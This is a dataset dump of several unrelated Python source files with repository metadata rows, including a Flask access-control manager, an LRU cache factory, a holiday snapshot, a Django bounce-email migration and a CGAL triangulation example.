(name is the description of the permission, and key is generally a string
represent the permission in data model). In each permission, there is also
a list of dict which represent other permissions under this permission.
This tree-like structure is called ptree in flask_ac, and it will generate
the actual ptree object when init ACManager instance
'''
def __init__(self, permissions, app=None, roles_loader=None,
permissions_loader=None, default_error_handler=None):
# TODO: support for cfg or other format permission
self.ptree = self.build_ptree_from_obj(permissions)
self.roles_loader = roles_loader
self.permissions_loader = permissions_loader
self.default_error_handler = default_error_handler
# Bounded to the app if provided
if app is not None:
self.init_app(app)
def init_app(self, app):
'''
Bound the ACManager instance so the flask or other application can
access manager anywhere with context
'''
app.ac_manager = self
def get_valid_permissions(self, permissions):
'''
Get all valid nodes by traversal top-down from root to leaf
'''
return ptree.get_nodes_in_path(self.ptree, permissions)
def allow_access(self, roles=None, permissions=None):
if roles:
return self._allow_access_by_role(roles)
valid_permissions = self.get_valid_permissions(permissions)
return self._allow_access_by_permissions(valid_permissions)
def _allow_access_by_role(self, roles):
roles = set(roles)
user_roles = set(self.get_user_roles())
intersactions = self._get_intersection(roles, user_roles)
return len(intersactions) > 0
def _allow_access_by_permissions(self, permissions):
permissions = set(permissions)
user_permissions = set(self.get_user_permissions())
intersactions = self._get_intersection(permissions, user_permissions)
return len(intersactions) > 0
def _get_intersection(self, set_1, set_2):
return set_1.intersection(set_2)
def get_user_roles(self):
if self.permissions_loader:
return self.roles_loader()
return self._roles_loader()
def get_user_permissions(self):
"""
Get current user permissions keys
return: list of permision keys
"""
if self.permissions_loader:
return self.permissions_loader()
return self._permissions_loader()
def _roles_loader(self):
'''
Default roles loader
By default, ac_manager will query user from flask global g.user
To query from session or other place, provide the loader when
initializing the ac_manager instance
'''
user = g.user
roles = user.get('roles', [])
return [role.get('name') for role in roles]
def _permissions_loader(self):
'''
Default roles loader
By default, ac_manager will query user from flask global g.user
To query from session or other place, provide the loader when
initializing the ac_manager instance
'''
user = g.user
roles = user.get('roles')
permissions = []
for role in roles:
permissions += role.get('permissions')
return permissions
def build_ptree_from_obj(self, obj):
'''
Build ptree from provider permission object
'''
return ptree.create_ptree_from_obj(obj)
def get_child_permissions(self, permission):
'''
Get all child permissions of provided permissions
return: Permission objects
'''
return ptree.get_child_permissions(permission)
def get_permissions_by_keys(self, permission_keys):
'''
Get Permission object by permission names
return: Permission object
'''
permissions = ptree.get_permissions_by_keys(
self.ptree, permission_keys)
return permissions
| 30.791946 | 78 | 0.666521 | 565 | 4,588 | 5.223009 | 0.224779 | 0.040664 | 0.035581 | 0.027448 | 0.224331 | 0.164012 | 0.152152 | 0.126737 | 0.126737 | 0.126737 | 0 | 0.001792 | 0.27027 | 4,588 | 148 | 79 | 31 | 0.87963 | 0.348954 | 0 | 0.135593 | 0 | 0 | 0.009409 | 0 | 0 | 0 | 0 | 0.006757 | 0 | 1 | 0.237288 | false | 0 | 0.033898 | 0.016949 | 0.542373 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
16d9ddbb8ef132a83e263c7823864705ee1e4de4 | 1,886 | py | Python | sandbox/lib/jumpscale/JumpScale9Lib/data/cachelru/LRUCacheFactory.py | Jumpscale/sandbox_linux | 2aacd36b467ef30ac83718abfa82c6883b67a02f | [
"Apache-2.0"
] | 2 | 2017-06-07T08:11:47.000Z | 2017-11-10T02:19:48.000Z | JumpScale9Lib/data/cachelru/LRUCacheFactory.py | Jumpscale/lib9 | 82224784ef2a7071faeb48349007211c367bc673 | [
"Apache-2.0"
] | 188 | 2017-06-21T06:16:13.000Z | 2020-06-17T14:20:24.000Z | sandbox/lib/jumpscale/JumpScale9Lib/data/cachelru/LRUCacheFactory.py | Jumpscale/sandbox_linux | 2aacd36b467ef30ac83718abfa82c6883b67a02f | [
"Apache-2.0"
] | 3 | 2018-06-12T05:18:28.000Z | 2019-09-24T06:49:17.000Z | from .LRUCache import LRUCache
from .RWCache import RWCache
from js9 import j
JSBASE = j.application.jsbase_get_class()
class LRUCacheFactory(JSBASE):
def __init__(self):
self.__jslocation__ = "j.data.cachelru"
JSBASE.__init__(self)
def getRWCache(self, nrItemsReadCache, nrItemsWriteCache=50, maxTimeWriteCache=2000, writermethod=None):
return RWCache(nrItemsReadCache, nrItemsWriteCache, maxTimeWriteCache, writermethod=writermethod)
def getRCache(self, nritems):
"""
Least-Recently-Used (LRU) cache.
Written by http://evan.prodromou.name/Software/Python/LRUCache
Instances of this class provide a least-recently-used (LRU) cache. They
emulate a Python mapping type. You can use an LRU cache more or less like
a Python dictionary, with the exception that objects you put into the
cache may be discarded before you take them out.
Some example usage::
cache = LRUCache(32) # new cache
cache['foo'] = get_file_contents('foo') # or whatever
if 'foo' in cache: # if it's still in cache...
# use cached version
contents = cache['foo']
else:
# recalculate
contents = get_file_contents('foo')
# store in cache for next time
cache['foo'] = contents
print cache.size # Maximum size
print len(cache) # 0 <= len(cache) <= cache.size
cache.size = 10 # Auto-shrink on size assignment
for i in range(50): # note: larger than cache size
cache[i] = i
if 0 not in cache: print 'Zero was discarded.'
if 42 in cache:
del cache[42] # Manual deletion
for j in cache: # iterate (in LRU order)
print j, cache[j] # iterator produces keys, not values
"""
return LRUCache(nritems)
| 32.517241 | 108 | 0.630965 | 235 | 1,886 | 4.987234 | 0.523404 | 0.035836 | 0.02901 | 0.03413 | 0.042662 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014126 | 0.28685 | 1,886 | 57 | 109 | 33.087719 | 0.857249 | 0.585896 | 0 | 0 | 0 | 0 | 0.027322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.083333 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
16e10a2d3e436b739ef807c899e648c10aab98aa | 2,481 | py | Python | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 32 | 2019-04-12T08:01:34.000Z | 2022-02-28T04:41:50.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 74 | 2019-07-09T16:35:20.000Z | 2022-03-09T16:41:34.000Z | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[en_US-2018] 1.py | gour/holidata | 89c7323f9c5345a3ecbf5cd5a835b0e08cfebc13 | [
"MIT"
] | 20 | 2019-01-28T07:41:02.000Z | 2022-02-16T02:38:57.000Z | [
{
'date': '2018-01-01',
'description': "New Year's Day",
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2018-01-15',
'description': 'Birthday of Martin Luther King, Jr.',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-02-19',
'description': "Washington's Birthday",
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-04-16',
'description': "Patriots' Day",
'locale': 'en-US',
'notes': '',
'region': 'MA',
'type': 'V'
},
{
'date': '2018-04-16',
'description': "Patriots' Day",
'locale': 'en-US',
'notes': '',
'region': 'ME',
'type': 'V'
},
{
'date': '2018-05-28',
'description': 'Memorial Day',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-07-04',
'description': 'Independence Day',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2018-09-03',
'description': 'Labor Day',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-10-08',
'description': 'Columbus Day',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-11-11',
'description': 'Veterans Day',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2018-11-22',
'description': 'Thanksgiving Day',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-11-23',
'description': 'Day after Thanksgiving',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NV'
},
{
'date': '2018-12-24',
'description': 'Christmas Eve',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2018-12-25',
'description': 'Christmas Day',
'locale': 'en-US',
'notes': '',
'region': '',
'type': 'NRF'
}
] | 21.763158 | 61 | 0.362354 | 206 | 2,481 | 4.364078 | 0.26699 | 0.124583 | 0.155729 | 0.233593 | 0.596218 | 0.596218 | 0.596218 | 0.53059 | 0.53059 | 0.422692 | 0 | 0.075676 | 0.403466 | 2,481 | 114 | 62 | 21.763158 | 0.531757 | 0 | 0 | 0.508772 | 0 | 0 | 0.389605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
16e2644202c1effe06c71a48156791d41f08afd4 | 139 | py | Python | 2021/examples-in-class-2021-09-24/summationformula.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | 1 | 2021-02-04T16:59:11.000Z | 2021-02-04T16:59:11.000Z | 2021/examples-in-class-2021-09-24/summationformula.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | null | null | null | 2021/examples-in-class-2021-09-24/summationformula.py | ati-ozgur/course-python | 38237d120043c07230658b56dc3aeb01c3364933 | [
"Apache-2.0"
] | 1 | 2019-10-30T14:37:48.000Z | 2019-10-30T14:37:48.000Z | str_n = input("please enter a number: ")
n = int(str_n)
summation = int(n* (n+1) / 2)
print("summation of 1..",n, "is equal to", summation) | 34.75 | 53 | 0.640288 | 26 | 139 | 3.346154 | 0.615385 | 0.091954 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025641 | 0.158273 | 139 | 4 | 53 | 34.75 | 0.717949 | 0 | 0 | 0 | 0 | 0 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
16f0568cc75defdf6b8661fc6cf966d0a0a0ed76 | 1,990 | py | Python | avalon/ids.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | 1 | 2015-11-09T05:26:57.000Z | 2015-11-09T05:26:57.000Z | avalon/ids.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | 4 | 2015-02-08T20:14:54.000Z | 2015-07-07T23:44:42.000Z | avalon/ids.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Avalon Music Server
#
# Copyright 2012-2015 TSH Labs <projects@tshlabs.org>
#
# Available under the MIT license. See LICENSE for details.
#
"""Methods for generating stable IDs for albums, artists, genres, and tracks."""
from __future__ import absolute_import, unicode_literals
import uuid
from avalon.compat import to_uuid_input
NS_ALBUMS = uuid.UUID('7655e605-6eaa-40d8-a25f-5c6c92a4d31a')
NS_ARTISTS = uuid.UUID('fe4df0f6-2c55-4ba6-acf3-134eae3e710e')
NS_GENRES = uuid.UUID('dd8dbd9c-8ed7-4719-80c5-71d978665dd0')
NS_TRACKS = uuid.UUID('4151ace3-6a98-41cd-a3de-8c242654cb67')
def _normalize_no_case(value):
"""Normalize a text type by converting it to lower case and
then converting to the correct type to be used as UUID input
(varies depending on the version of Python running).
"""
return to_uuid_input(value.lower())
def get_album_id(name):
"""Generate a UUID based on the album name (case insensitive).
:param unicode name: Name of the album
:return: UUID based on the name of the album
:rtype: uuid.UUID
"""
return uuid.uuid5(NS_ALBUMS, _normalize_no_case(name))
def get_artist_id(name):
"""Generate a UUID based on the artist name (case insensitive).
:param unicode name: Name of the artist
:return: UUID based on the name of the artist
:rtype: uuid.UUID
"""
return uuid.uuid5(NS_ARTISTS, _normalize_no_case(name))
def get_genre_id(name):
"""Generate a UUID based on the genre name (case insensitive).
:param unicode name: Name of the genre
:return: UUID based on the name of the genre
:rtype: uuid.UUID
"""
return uuid.uuid5(NS_GENRES, _normalize_no_case(name))
def get_track_id(path):
"""Generate a UUID based on the path of a track (case sensitive).
:param unicode path: Absolute path to a track
:return: UUID based on the path of the track
:rtype: uuid.UUID
"""
return uuid.uuid5(NS_TRACKS, to_uuid_input(path))
| 28.028169 | 80 | 0.715578 | 303 | 1,990 | 4.567657 | 0.336634 | 0.032514 | 0.063584 | 0.080925 | 0.401734 | 0.397399 | 0.307803 | 0.221098 | 0.095376 | 0 | 0 | 0.055074 | 0.18794 | 1,990 | 70 | 81 | 28.428571 | 0.801361 | 0.534171 | 0 | 0 | 0 | 0 | 0.178218 | 0.178218 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0.176471 | 0 | 0.764706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
bc47964072f02b56ae40a79f5746b212b96e4cd2 | 1,292 | py | Python | setup.py | tom-010/generate_gerrit_jenkins_project | 499c6f4d040cfd673d96487b0c74b3ad51df5d59 | [
"Apache-2.0"
] | null | null | null | setup.py | tom-010/generate_gerrit_jenkins_project | 499c6f4d040cfd673d96487b0c74b3ad51df5d59 | [
"Apache-2.0"
] | null | null | null | setup.py | tom-010/generate_gerrit_jenkins_project | 499c6f4d040cfd673d96487b0c74b3ad51df5d59 | [
"Apache-2.0"
] | null | null | null | import pathlib
from setuptools import setup, find_packages
from distutils.core import setup
HERE = pathlib.Path(__file__).parent
README = (HERE / "README.md").read_text()
setup(
name='generate_gerrit_jenkins_project',
url='https://github.com/tom-010/generate_gerrit_jenkins_project',
version='0.0.1',
author='Thomas Deniffel',
author_email='tdeniffel@gmail.com',
packages=['generate_gerrit_jenkins_project'], # find_packages(),
license='Apache2',
install_requires=[
'python-jenkins',
'easy-exec'
],
entry_points = {
'console_scripts': ['generate_gerrit_jenkins_project = generate_gerrit_jenkins_project:main']
},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
description='A tool to generate a project from a given template with a preconfigured Gerrit-project and Jenkins-pipelines.',
long_description=README,
long_description_content_type="text/markdown",
python_requires='>=3',
package_data={'': ['jobs/*']},
include_package_data=True,
) | 34 | 128 | 0.675697 | 144 | 1,292 | 5.826389 | 0.569444 | 0.083433 | 0.125149 | 0.166865 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013462 | 0.195046 | 1,292 | 38 | 129 | 34 | 0.793269 | 0.012384 | 0 | 0.057143 | 1 | 0.028571 | 0.487843 | 0.101176 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.085714 | 0 | 0.085714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bc4835b2d83fda3f270cc8ae70dca91104e54aa1 | 536 | py | Python | nlp_annotator_api/annotators/entities/CountriesAnnotator.py | dasaku-ai/nlpmodel-v-h | 326bb9467df11d517285610c70f9d22627eb5efc | [
"Apache-2.0"
] | 3 | 2022-01-04T12:15:22.000Z | 2022-03-25T21:19:20.000Z | nlp_annotator_api/annotators/entities/CountriesAnnotator.py | IBM/deepsearch-nlp-annotator-api-example | 76c2c8fd83c1e6d51c51c7b581a8c3f273b23c40 | [
"Apache-2.0"
] | 1 | 2022-02-02T09:26:44.000Z | 2022-02-02T09:26:44.000Z | nlp_annotator_api/annotators/entities/CountriesAnnotator.py | dasaku-ai/nlpmodel-v-h | 326bb9467df11d517285610c70f9d22627eb5efc | [
"Apache-2.0"
] | 5 | 2021-09-27T08:26:09.000Z | 2022-03-10T11:41:35.000Z | import os
from typing import Any, Optional
from .common.utils import resources_dir
from .common.DictionaryTextEntityAnnotator import Config, DictionaryTextEntityAnnotator
class CountriesAnnotator(DictionaryTextEntityAnnotator):
def key(self) -> str:
return "countries"
def description(self) -> str:
return "Names of countries"
def __init__(self):
super().__init__(
Config(
dictionary_filename=os.path.join(resources_dir, "countries.json")
)
)
| 25.52381 | 87 | 0.673507 | 51 | 536 | 6.862745 | 0.588235 | 0.057143 | 0.074286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.248134 | 536 | 20 | 88 | 26.8 | 0.868486 | 0 | 0 | 0 | 0 | 0 | 0.076493 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.266667 | 0.133333 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
bc519f9cec84f66e792705f21e0c5afd96472df0 | 147 | py | Python | client_1c_timesheet/__init__.py | SabNK/client_1c_timesheet | 17bb883c716d3e8fb9495ba3fa45aa78e0fd5730 | [
"MIT"
] | null | null | null | client_1c_timesheet/__init__.py | SabNK/client_1c_timesheet | 17bb883c716d3e8fb9495ba3fa45aa78e0fd5730 | [
"MIT"
] | null | null | null | client_1c_timesheet/__init__.py | SabNK/client_1c_timesheet | 17bb883c716d3e8fb9495ba3fa45aa78e0fd5730 | [
"MIT"
] | null | null | null | """Top-level package for Client 1C for Time Sheet."""
__author__ = """Nick K Sabinin"""
__email__ = 'sabnk@optictelecom.ru'
__version__ = '0.1.0'
| 24.5 | 53 | 0.693878 | 21 | 147 | 4.285714 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031496 | 0.136054 | 147 | 5 | 54 | 29.4 | 0.677165 | 0.319728 | 0 | 0 | 0 | 0 | 0.425532 | 0.223404 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bc5aa9c244d02c6bf5e644e67290efc29cdc0445 | 442 | py | Python | boto3_exceptions/ce.py | siteshen/boto3_exceptions | d6174c2577c9d4b17a09a89cd0e4bd1fe555b26b | [
"MIT"
] | 2 | 2021-06-22T00:00:35.000Z | 2021-07-15T03:25:52.000Z | boto3_exceptions/ce.py | siteshen/boto3_exceptions | d6174c2577c9d4b17a09a89cd0e4bd1fe555b26b | [
"MIT"
] | null | null | null | boto3_exceptions/ce.py | siteshen/boto3_exceptions | d6174c2577c9d4b17a09a89cd0e4bd1fe555b26b | [
"MIT"
] | null | null | null | import boto3
exceptions = boto3.client('ce').exceptions
BillExpirationException = exceptions.BillExpirationException
DataUnavailableException = exceptions.DataUnavailableException
InvalidNextTokenException = exceptions.InvalidNextTokenException
LimitExceededException = exceptions.LimitExceededException
RequestChangedException = exceptions.RequestChangedException
UnresolvableUsageUnitException = exceptions.UnresolvableUsageUnitException
| 40.181818 | 74 | 0.900452 | 25 | 442 | 15.92 | 0.44 | 0.165829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004796 | 0.056561 | 442 | 10 | 75 | 44.2 | 0.94964 | 0 | 0 | 0 | 0 | 0 | 0.004525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bc60bf7a647586d257896949febeb33bf45b3781 | 3,426 | py | Python | corehq/util/migrations/0002_complaintbouncemeta_permanentbouncemeta_transientbounceemail.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 471 | 2015-01-10T02:55:01.000Z | 2022-03-29T18:07:18.000Z | corehq/util/migrations/0002_complaintbouncemeta_permanentbouncemeta_transientbounceemail.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 14,354 | 2015-01-01T07:38:23.000Z | 2022-03-31T20:55:14.000Z | corehq/util/migrations/0002_complaintbouncemeta_permanentbouncemeta_transientbounceemail.py | dimagilg/commcare-hq | ea1786238eae556bb7f1cbd8d2460171af1b619c | [
"BSD-3-Clause"
] | 175 | 2015-01-06T07:16:47.000Z | 2022-03-29T13:27:01.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.27 on 2020-01-27 17:01
from __future__ import unicode_literals
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('util', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ComplaintBounceMeta',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('timestamp', models.DateTimeField()),
('headers', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)),
('feedback_type', models.CharField(blank=True, max_length=50, null=True)),
('sub_type', models.CharField(blank=True, max_length=50, null=True)),
('destination', django.contrib.postgres.fields.ArrayField(
base_field=models.EmailField(max_length=254),
blank=True,
default=list,
null=True,
size=None
)),
('bounced_email', models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to='util.BouncedEmail'
)),
],
),
migrations.CreateModel(
name='PermanentBounceMeta',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('timestamp', models.DateTimeField()),
('sub_type', models.CharField(
choices=[
('General', 'General'),
('Suppressed', 'Suppressed'),
('Undetermined', 'Undetermined')
], max_length=20)),
('headers', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)),
('reason', models.TextField(blank=True, null=True)),
('destination', django.contrib.postgres.fields.ArrayField(
base_field=models.EmailField(max_length=254),
blank=True,
default=list,
null=True,
size=None
)),
('bounced_email', models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to='util.BouncedEmail'
)),
],
),
migrations.CreateModel(
name='TransientBounceEmail',
fields=[
('id', models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID'
)),
('created', models.DateTimeField(auto_now_add=True)),
('email', models.EmailField(db_index=True, max_length=254)),
('timestamp', models.DateTimeField(db_index=True)),
('headers', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)),
],
),
]
| 41.277108 | 114 | 0.522767 | 296 | 3,426 | 5.922297 | 0.297297 | 0.041072 | 0.083856 | 0.107815 | 0.706788 | 0.666286 | 0.666286 | 0.666286 | 0.666286 | 0.666286 | 0 | 0.01675 | 0.355225 | 3,426 | 82 | 115 | 41.780488 | 0.776822 | 0.02014 | 0 | 0.6 | 1 | 0 | 0.099881 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.106667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bc68ad3a94fb1b914c47c186936033efeed04011 | 2,792 | py | Python | CoreSystem/examples/triangulate9.py | josuehfa/DAASystem | a1fe61ffc19f0781eeeddcd589137eefde078a45 | [
"MIT"
] | 1 | 2020-03-17T01:13:02.000Z | 2020-03-17T01:13:02.000Z | CoreSystem/examples/triangulate9.py | josuehfa/DAASystem | a1fe61ffc19f0781eeeddcd589137eefde078a45 | [
"MIT"
] | null | null | null | CoreSystem/examples/triangulate9.py | josuehfa/DAASystem | a1fe61ffc19f0781eeeddcd589137eefde078a45 | [
"MIT"
] | 1 | 2021-12-02T11:11:36.000Z | 2021-12-02T11:11:36.000Z | from mesher.cgal_mesher import ConstrainedDelaunayTriangulation as CDT
from mesher.cgal_mesher import (
Point, Mesher, make_conforming_delaunay, make_conforming_gabriel, Criteria
)
def main():
cdt = CDT()
va = cdt.insert(Point(100, 269))
vb = cdt.insert(Point(246, 269))
vc = cdt.insert(Point(246, 223))
vd = cdt.insert(Point(303, 223))
ve = cdt.insert(Point(303, 298))
vf = cdt.insert(Point(246, 298))
vg = cdt.insert(Point(246, 338))
vh = cdt.insert(Point(355, 338))
vi = cdt.insert(Point(355, 519))
vj = cdt.insert(Point(551, 519))
vk = cdt.insert(Point(551, 445))
vl = cdt.insert(Point(463, 445))
vm = cdt.insert(Point(463, 377))
vn = cdt.insert(Point(708, 377))
vo = cdt.insert(Point(708, 229))
vp = cdt.insert(Point(435, 229))
vq = cdt.insert(Point(435, 100))
vr = cdt.insert(Point(100, 100))
cdt.insert_constraint(va, vb)
cdt.insert_constraint(vb, vc)
cdt.insert_constraint(vc, vd)
cdt.insert_constraint(vd, ve)
cdt.insert_constraint(ve, vf)
cdt.insert_constraint(vf, vg)
cdt.insert_constraint(vg, vh)
cdt.insert_constraint(vh, vi)
cdt.insert_constraint(vi, vj)
cdt.insert_constraint(vj, vk)
cdt.insert_constraint(vk, vl)
cdt.insert_constraint(vl, vm)
cdt.insert_constraint(vm, vn)
cdt.insert_constraint(vn, vo)
cdt.insert_constraint(vo, vp)
cdt.insert_constraint(vp, vq)
cdt.insert_constraint(vq, vr)
cdt.insert_constraint(vr, va)
vs = cdt.insert(Point(349, 236))
vt = cdt.insert(Point(370, 236))
vu = cdt.insert(Point(370, 192))
vv = cdt.insert(Point(403, 192))
vw = cdt.insert(Point(403, 158))
vx = cdt.insert(Point(349, 158))
cdt.insert_constraint(vs, vt)
cdt.insert_constraint(vt, vu)
cdt.insert_constraint(vu, vv)
cdt.insert_constraint(vv, vw)
cdt.insert_constraint(vw, vx)
cdt.insert_constraint(vx, vs)
vy = cdt.insert(Point(501, 336))
vz = cdt.insert(Point(533, 336))
v1 = cdt.insert(Point(519, 307))
v2 = cdt.insert(Point(484, 307))
cdt.insert_constraint(vy, vz)
cdt.insert_constraint(vz, v1)
cdt.insert_constraint(v1, v2)
cdt.insert_constraint(v2, vy)
print("Number of vertices:", cdt.number_of_vertices())
mesher = Mesher(cdt)
seeds = [
Point(505, 325),
Point(379, 172),
]
mesher.seeds_from(seeds)
make_conforming_delaunay(cdt)
print("Number of vertices:", cdt.number_of_vertices())
make_conforming_gabriel(cdt)
print("Number of vertices:", cdt.number_of_vertices())
mesher.criteria = Criteria(
aspect_bound=0.125,
size_bound=30
)
mesher.refine_mesh()
print("Number of vertices:", cdt.number_of_vertices())
if __name__ == '__main__':
main()
| 29.389474 | 78 | 0.655802 | 405 | 2,792 | 4.377778 | 0.224691 | 0.284264 | 0.221094 | 0.038353 | 0.129724 | 0.100395 | 0.100395 | 0.100395 | 0.077834 | 0 | 0 | 0.086176 | 0.202006 | 2,792 | 94 | 79 | 29.702128 | 0.709605 | 0 | 0 | 0.049383 | 0 | 0 | 0.030086 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012346 | false | 0 | 0.024691 | 0 | 0.037037 | 0.049383 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
